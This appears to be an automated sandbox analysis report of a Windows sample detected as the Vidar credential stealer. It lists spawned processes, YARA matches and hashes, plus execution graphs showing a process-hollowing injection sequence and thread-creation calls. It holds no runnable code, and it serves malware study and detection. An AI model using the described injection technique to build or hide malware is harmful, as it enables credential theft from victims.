                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Fri, 29 Mar 2024 11:08:27 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-03-29 11:08:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:12:07:49
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                  Imagebase:0xc20000
                                                                                                                                                                                                                                                  File size:244'360 bytes
                                                                                                                                                                                                                                                  MD5 hash:0CE3DC374E49433D7E15D02C015E0EE3
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:12:07:49
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:12:07:50
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                  Imagebase:0x210000
                                                                                                                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:12:07:50
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                                  Imagebase:0xf50000
                                                                                                                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:12:07:50
                                                                                                                                                                                                                                                  Start date:29/03/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 932
                                                                                                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                                                                                                  File size:483'680 bytes
                                                                                                                                                                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:42.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:21.3%
                                                                                                                                                                                                                                                    Total number of Nodes:61
                                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                                    execution_graph 699 2d305a0 700 2d305a5 699->700 704 2d30970 700->704 720 2d30960 700->720 701 2d3085a 718 2d3099a 704->718 705 2d309eb 710 2d30eef VirtualProtectEx 705->710 706 2d30a09 709 2d30b34 706->709 713 2d30eef VirtualProtectEx 706->713 741 2d31446 706->741 746 2d31578 706->746 707 2d30a70 707->709 750 2d31710 707->750 754 2d31708 707->754 708 2d30b26 758 2d31658 708->758 762 2d31651 708->762 709->701 710->706 713->707 736 2d30eef 718->736 721 2d3099a 720->721 731 2d30eef VirtualProtectEx 721->731 722 2d309eb 732 2d30eef VirtualProtectEx 722->732 723 2d30a09 724 2d30b34 723->724 733 2d31446 VirtualProtectEx 723->733 734 2d31578 VirtualProtectEx 723->734 735 2d30eef VirtualProtectEx 723->735 724->701 725 2d30a70 725->724 727 2d31710 CreateThread 725->727 728 2d31708 CreateThread 725->728 726 2d30b26 729 2d31651 CreateThread 726->729 730 2d31658 CreateThread 726->730 727->726 728->726 729->724 730->724 731->722 732->723 733->725 734->725 735->725 739 2d30f2a 736->739 740 2d310ef 736->740 737 2d315d6 VirtualProtectEx 738 2d31607 737->738 738->705 739->737 739->740 740->705 743 2d313eb 741->743 742 2d315d6 VirtualProtectEx 745 2d31607 742->745 743->742 744 2d31558 743->744 744->707 745->707 747 2d315c3 VirtualProtectEx 746->747 749 2d31607 747->749 749->707 751 2d3175b CreateThread 750->751 753 2d317bb 751->753 753->708 755 2d3175b CreateThread 754->755 757 2d317bb 755->757 757->708 759 2d31698 CreateThread 758->759 761 2d316cc 759->761 761->709 763 2d31658 CreateThread 762->763 765 2d316cc 763->765 765->709 766 2ec2111 769 2ec2149 766->769 767 2ec2257 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 768 2ec2326 WriteProcessMemory 767->768 767->769 770 2ec236b 768->770 769->767 771 2ec2316 TerminateProcess 769->771 772 2ec23ad WriteProcessMemory Wow64SetThreadContext ResumeThread 770->772 773 2ec2370 WriteProcessMemory 770->773 771->767 773->770

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 02EC2111 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02EC2280
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02EC2293
                                                                                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02EC22B1
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02EC22D5
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02EC2300
                                                                                                                                                                                                                                                    • TerminateProcess.KERNELBASE(?,00000000), ref: 02EC231F
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02EC2358
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02EC23A3
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02EC23E1
                                                                                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 02EC241D
                                                                                                                                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 02EC242C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701753746.0000000002EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC1000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2ec1000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                                                                                                                                                                                                                                                    • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                                                                    • API String ID: 2440066154-977067982
                                                                                                                                                                                                                                                    • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                    • Instruction ID: dcbb0984f3e0cd4de778bc5af713c51576ebbe0009adf5b5bf2a448c187cff6d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75B1E67664024AAFDB60CFA8CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 02D30EEF Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 566COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 22 2d30eef-2d30f24 23 2d30f2a-2d30f2f 22->23 24 2d310ef-2d310f6 22->24 25 2d30f31-2d30f3d 23->25 26 2d30f56-2d30f5b 23->26 25->26 27 2d30f3f-2d30f4b 25->27 30 2d30f62-2d30f67 26->30 27->26 28 2d30f4d-2d30f54 27->28 28->30 31 2d310f7-2d31148 30->31 32 2d30f6d-2d30f79 30->32 40 2d3114a-2d3115a 31->40 32->31 33 2d30f7f-2d30f8b 32->33 33->31 34 2d30f91-2d30fbe 33->34 41 2d30fc5-2d30fdb 34->41 44 2d3115c-2d31172 40->44 41->31 45 2d30fe1-2d31027 41->45 49 2d31175-2d311de 44->49 45->31 55 2d3102d-2d31073 45->55 73 2d31222-2d3122c 49->73 74 2d311e0-2d311e4 49->74 55->31 65 2d31079-2d31088 55->65 65->31 66 2d3108a-2d31096 65->66 66->31 68 2d31098-2d310a4 66->68 68->31 69 2d310a6-2d310b2 68->69 69->31 70 2d310b4-2d310c0 69->70 70->31 72 2d310c2-2d310ce 70->72 72->31 76 2d310d0-2d310dc 72->76 73->49 75 2d31232-2d31277 73->75 77 2d311f3-2d31206 74->77 78 2d311e6-2d311eb 74->78 97 2d31281-2d312c2 75->97 76->31 79 2d310de-2d310e9 76->79 82 2d31562-2d31605 VirtualProtectEx 77->82 83 2d3120c-2d3121b 77->83 78->77 79->23 79->24 90 2d31607-2d3160d 82->90 91 2d3160e-2d3163e 82->91 83->73 90->91 103 2d312d1-2d312d7 97->103 104 2d312c4-2d312c9 97->104 103->82 105 2d312dd-2d312f6 103->105 104->103 105->82 107 2d312fc-2d3131d 105->107 107->49 109 2d31323-2d3132b 107->109 110 2d3132e-2d31335 109->110 111 2d31380-2d31389 110->111 112 2d31337-2d3133e 110->112 111->82 114 2d3138f-2d3139d 111->114 112->111 113 2d31340-2d3134c 112->113 113->82 115 2d31352-2d3135f 113->115 114->82 116 2d313a3-2d313b1 114->116 115->82 117 2d31365-2d31374 115->117 116->82 118 2d313b7-2d313c4 116->118 119 2d31376-2d3137c 117->119 120 2d3137d 117->120 118->82 121 2d313ca-2d313da 118->121 119->120 120->111 121->110 122 2d313e0-2d313e8 121->122 123 2d313eb-2d313f7 122->123 124 2d3154b-2d31552 123->124 125 2d313fd-2d31406 123->125 124->123 128 2d31558-2d3155f 124->128 126 2d31408-2d3140e 125->126 127 2d3140f-2d3141e 125->127 126->127 127->82 129 2d31424-2d31430 127->129 130 2d31432-2d31438 129->130 131 2d31439-2d31454 129->131 130->131 131->82 133 2d3145a-2d31468 131->133 133->82 134 2d3146e-2d31479 133->134 135 2d31511-2d31528 134->135 136 2d3147f-2d31486 134->136 140 2d3152a-2d31537 135->140 141 2d31539-2d31545 135->141 136->135 137 2d3148c-2d31495 136->137 137->82 139 2d3149b-2d314ab 137->139 139->82 142 2d314b1-2d314c9 139->142 140->140 140->141 141->124 141->125 143 2d314d3-2d314dc 142->143 144 2d314cb-2d314d2 142->144 143->82 145 2d314e2-2d314fb 143->145 144->143 147 2d31509-2d3150f 145->147 148 2d314fd-2d314ff 145->148 147->135 148->147
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02D315F8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 544645111-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: 596f54085a3ec59c57e41fb939852c5fa1e799e09193368409c7ff10a8f30290
                                                                                                                                                                                                                                                    • Instruction ID: 376e44747149dff568c6da5a93750a1e1cf4aca7903e6711b18a973aa2412d54
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 596f54085a3ec59c57e41fb939852c5fa1e799e09193368409c7ff10a8f30290
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61327F31A002568FCB16CFA9C480A9DFBF2BF89314F59C559D45AAB352C734EC82CB95
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 02D31708 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 149 2d31708-2d31767 151 2d31777-2d317b9 CreateThread 149->151 152 2d31769-2d31775 149->152 154 2d317c2-2d317e7 151->154 155 2d317bb-2d317c1 151->155 152->151 155->154
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 02D317AC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: 054daf5130d5c8cc9f1fa828028f97a9e010b371ca8a5efaca7a5378dfc83da6
                                                                                                                                                                                                                                                    • Instruction ID: 9778d2deddc866831d3afa9c242395dc982d0cc461a243dfc71c9683eb254102
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 054daf5130d5c8cc9f1fa828028f97a9e010b371ca8a5efaca7a5378dfc83da6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 593103B5A003499FCB10CFA9D984AEEBBF1FF48314F24842AE859A7311C7759954CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 02D31710 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 159 2d31710-2d31767 161 2d31777-2d317b9 CreateThread 159->161 162 2d31769-2d31775 159->162 164 2d317c2-2d317e7 161->164 165 2d317bb-2d317c1 161->165 162->161 165->164
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?,?,00000000,?,?), ref: 02D317AC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: daceca44a9b2cec2ec50c0658584b3e9d7ac08b3a6ca7fc47da4aef86902a553
                                                                                                                                                                                                                                                    • Instruction ID: 75987c82992b669ad00dc03d4364e96c704dbde54df83b03a3421d4b7fcc963f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daceca44a9b2cec2ec50c0658584b3e9d7ac08b3a6ca7fc47da4aef86902a553
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8321F3B5A00349DFCB10CFAAD984ADEBBF5FF48314F208429E919A7310C775A954CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 02D31578 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 169 2d31578-2d31605 VirtualProtectEx 172 2d31607-2d3160d 169->172 173 2d3160e-2d3163e 169->173 172->173
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 02D315F8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: 5d85f6f7436f9ffc2e09da158477cb09ea1342c16c07b50f884f86fd6bdd9122
                                                                                                                                                                                                                                                    • Instruction ID: bf99c365b8903d76f116e28d8200f4963a3a0230b656adcbaf45e6002841d59a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d85f6f7436f9ffc2e09da158477cb09ea1342c16c07b50f884f86fd6bdd9122
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C72139B1900259DFCB10DFAAC940ADEFBF5FF48310F108429E559A7250D7389944CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 02D31651 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 177 2d31651-2d316ca CreateThread 181 2d316d3-2d316f8 177->181 182 2d316cc-2d316d2 177->182 182->181
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?), ref: 02D316BD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: 836e0defccf42eea89c9921267450dd97eadc1a60e09b26c6bc686da77e2fa60
                                                                                                                                                                                                                                                    • Instruction ID: 880db1d391c97de5a783cf7e86758ff388245bcd92713c59df45f46d9f623cce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 836e0defccf42eea89c9921267450dd97eadc1a60e09b26c6bc686da77e2fa60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 361149B19003898BDB10DFAAC444BDEFFF5EF88324F248459D459A7350CB75A945CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 02D31658 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 186 2d31658-2d316ca CreateThread 189 2d316d3-2d316f8 186->189 190 2d316cc-2d316d2 186->190 190->189
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(?,?), ref: 02D316BD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1701669988.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2d30000_file.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                    • Opcode ID: 90af5a5a28c7f780077828bf06abbdfed7c446bf6d7536a302a16fc152f737a2
                                                                                                                                                                                                                                                    • Instruction ID: 4df6bca3a0facc3164b12df384d793dfec86ff197cee65c5ac39eac7249ab829
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90af5a5a28c7f780077828bf06abbdfed7c446bf6d7536a302a16fc152f737a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A31116B19002498BCB10DFAAC445BDEFBF5EB88324F248429D459A7250CB75A944CBA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:4.8%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:10.3%
                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                    Total number of Limit Nodes:40
                                                                                                                                                                                                                                                    execution_graph 76410 6c70b830 76411 6c70b83b 76410->76411 76412 6c70b86e dllmain_crt_process_detach 76410->76412 76413 6c70b860 dllmain_crt_process_attach 76411->76413 76414 6c70b840 76411->76414 76412->76414 76413->76414 76415 6c70b9c0 76416 6c70b9c9 76415->76416 76417 6c70b9ce dllmain_dispatch 76415->76417 76419 6c70bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 76416->76419 76419->76417 76420 4180d0 76445 402770 76420->76445 76428 4180f2 76543 40fe90 lstrlenA 76428->76543 76431 40fe90 3 API calls 76432 41811a 76431->76432 76433 40fe90 3 API calls 76432->76433 76434 418121 76433->76434 76547 40fdb0 76434->76547 76436 41812a 76437 41814a OpenEventA 76436->76437 76438 41818c 76437->76438 76439 41815c 76437->76439 76441 418195 CreateEventA 76438->76441 76440 418160 CloseHandle Sleep 76439->76440 76443 41817a OpenEventA 76439->76443 76440->76439 76551 417870 76441->76551 76443->76438 76443->76440 76707 402290 LocalAlloc 76445->76707 76447 402781 76448 402290 10 API calls 76447->76448 76449 402797 76448->76449 76450 402290 10 API calls 76449->76450 76451 4027ad 76450->76451 76452 402290 10 API calls 76451->76452 76453 4027c3 76452->76453 76454 402290 10 API calls 76453->76454 76455 4027d9 76454->76455 76456 402290 10 API calls 76455->76456 76457 4027ef 76456->76457 76458 402290 10 API calls 76457->76458 76459 402808 76458->76459 76460 402290 10 API calls 76459->76460 76461 40281e 76460->76461 76462 402290 10 API calls 76461->76462 76463 402834 76462->76463 76464 402290 10 API calls 76463->76464 76465 40284a 76464->76465 76466 402290 10 API calls 76465->76466 76467 402860 76466->76467 76468 402290 10 API calls 76467->76468 76469 402876 76468->76469 76470 402290 10 API calls 76469->76470 76471 40288f 76470->76471 76472 402290 10 API calls 76471->76472 76473 4028a5 76472->76473 76474 402290 10 API calls 76473->76474 76475 4028bb 76474->76475 76476 402290 10 API calls 76475->76476 76477 4028d1 76476->76477 76478 402290 10 API calls 76477->76478 76479 4028e7 76478->76479 76480 402290 10 API calls 76479->76480 76481 4028fd 76480->76481 76482 402290 10 API calls 76481->76482 76483 402916 76482->76483 76484 402290 10 API calls 76483->76484 76485 40292c 76484->76485 76486 402290 10 API calls 76485->76486 76487 402942 76486->76487 76488 402290 10 API calls 76487->76488 76489 402958 76488->76489 76490 402290 10 API calls 76489->76490 76491 40296e 76490->76491 76492 402290 10 API calls 76491->76492 76493 402984 76492->76493 76494 402290 10 API calls 76493->76494 76495 40299d 76494->76495 76496 402290 10 API calls 76495->76496 76497 4029b3 76496->76497 76498 402290 10 API calls 76497->76498 76499 4029c9 76498->76499 76500 402290 10 API calls 76499->76500 76501 4029df 76500->76501 76502 402290 10 API calls 76501->76502 76503 4029f5 76502->76503 76504 402290 10 API calls 76503->76504 76505 402a0b 76504->76505 76506 402290 10 API calls 76505->76506 76507 402a24 76506->76507 76508 402290 10 API calls 76507->76508 76509 402a3a 76508->76509 76510 402290 10 API calls 76509->76510 76511 402a50 76510->76511 76512 402290 10 API calls 76511->76512 76513 402a66 76512->76513 76514 402290 10 API calls 76513->76514 76515 402a7c 76514->76515 76516 402290 10 API calls 76515->76516 76517 402a92 76516->76517 76518 402290 10 API calls 76517->76518 76519 402aab 76518->76519 76520 402290 10 API calls 76519->76520 76521 402ac1 76520->76521 76522 402290 10 API calls 76521->76522 76523 402ad7 76522->76523 76524 4181d0 LoadLibraryA 76523->76524 76525 4183f7 